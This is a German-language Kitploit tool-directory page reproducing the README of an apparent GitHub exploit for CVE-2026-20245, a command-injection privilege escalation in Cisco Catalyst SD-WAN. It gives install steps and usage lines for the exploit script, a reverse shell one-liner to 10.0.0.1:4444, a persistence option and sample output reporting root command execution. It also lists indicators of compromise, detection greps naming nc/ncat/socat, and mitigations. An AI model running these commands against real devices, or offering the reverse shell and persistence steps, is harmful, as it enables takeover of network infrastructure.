Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationNetzwerksicherheitPenetrationstestsCommand and ControlLernen & Bildung
GitHubfevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**Dieser Code dient NUR zu Bildungszwecken und autorisierten Sicherheitstests.**

Repository anzeigen
313vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit

Security Rating CVSS CISA KEV

⚠️ WARNUNG

Dieser Code ist NUR für Bildungszwecke und autorisierte Sicherheitstests bestimmt.

📋 Beschreibung

CVE-2026-20245 ist eine Privilegieneskalations-Schwachstelle in der CLI von Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage) und Cisco Catalyst SD-WAN Validator (vBond). Ein authentifizierter Angreifer mit netadmin-Privilegien kann durch das Hochladen einer speziell gestalteten Datei beliebige Befehle als root ausführen.

Technische Details

FeldWert
CVECVE-2026-20245
CVSS7.8 (High)
VektorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
KomponenteCLI / CSV-Upload
TypCommand Injection (CWE-116)

🎯 Betroffene Versionen

ProduktVerwundbare Versionen
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

Spezifisch verwundbare Versionen:

  • 20.9.x (alle)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 Installation

# Repository klonen
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Abhängigkeiten installieren
pip install -r requirements.txt

# Berechtigungen erteilen
chmod +x exploit.py

📦 Abhängigkeiten

requests>=2.31.0

🚀 Verwendung

Version prüfen

python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only

Befehl ausführen

python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"

Reverse Shell

python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

Persistenz installieren

python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist

🔍 Erwartete Ausgabe

╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================

🔍 Kompromissindikatoren (IOCs)

In Logs prüfen (/var/log/scripts.log)

# Nach verdächtiger Aktivität suchen
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# Bestimmte Befehle, nach denen gesucht werden soll
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv

Verdächtige Dateien

/home/admin/*.csv (nicht autorisierte CSV-Dateien)

/tmp/*.csv

/var/log/scripts.log mit ungewöhnlichen Einträgen

Prozesse

# Nach ungewöhnlichen Root-Prozessen suchen
ps aux | grep -E "bash|sh|nc|ncat|socat"

🛡️ Gegenmaßnahmen

Option 1 - Auf behobene Version aktualisieren (EMPFOHLEN)

Version Behobene Version 20.18.2.1 und früher 20.18.3.1

Option 2 - Zugriff einschränken

Administrativen Zugriff auf das Verwaltungsnetzwerk beschränken

Multi-Faktor-Authentifizierung verwenden

CSV-Upload-Aktivität überwachen

Option 3 - Sichere Konfiguration

# Serial-Nummern-Upload deaktivieren, falls nicht erforderlich
no feature upload-serial-numbers

# netadmin-Privilegien einschränken
admin privilege restrict

📚 Referenzen

Cisco Security Advisory

NVD - CVE-2026-20245

CISA KEV Catalog

📊 Zeitleiste

DatumEreignis
2026-05-14Cisco veröffentlicht erstes Advisory
2026-06-04CVE offiziell veröffentlicht
2026-06-09CISA fügt zu KEV hinzu
2026-06-23CISA-Frist zum Patchen

⚖️ Haftungsausschluss

Diese Software wird „wie besehen" ohne Gewährleistung bereitgestellt. Der Autor ist nicht für missbräuchliche Verwendung verantwortlich. Verwenden Sie sie ausschließlich auf autorisierten Systemen.

Tool herunterladen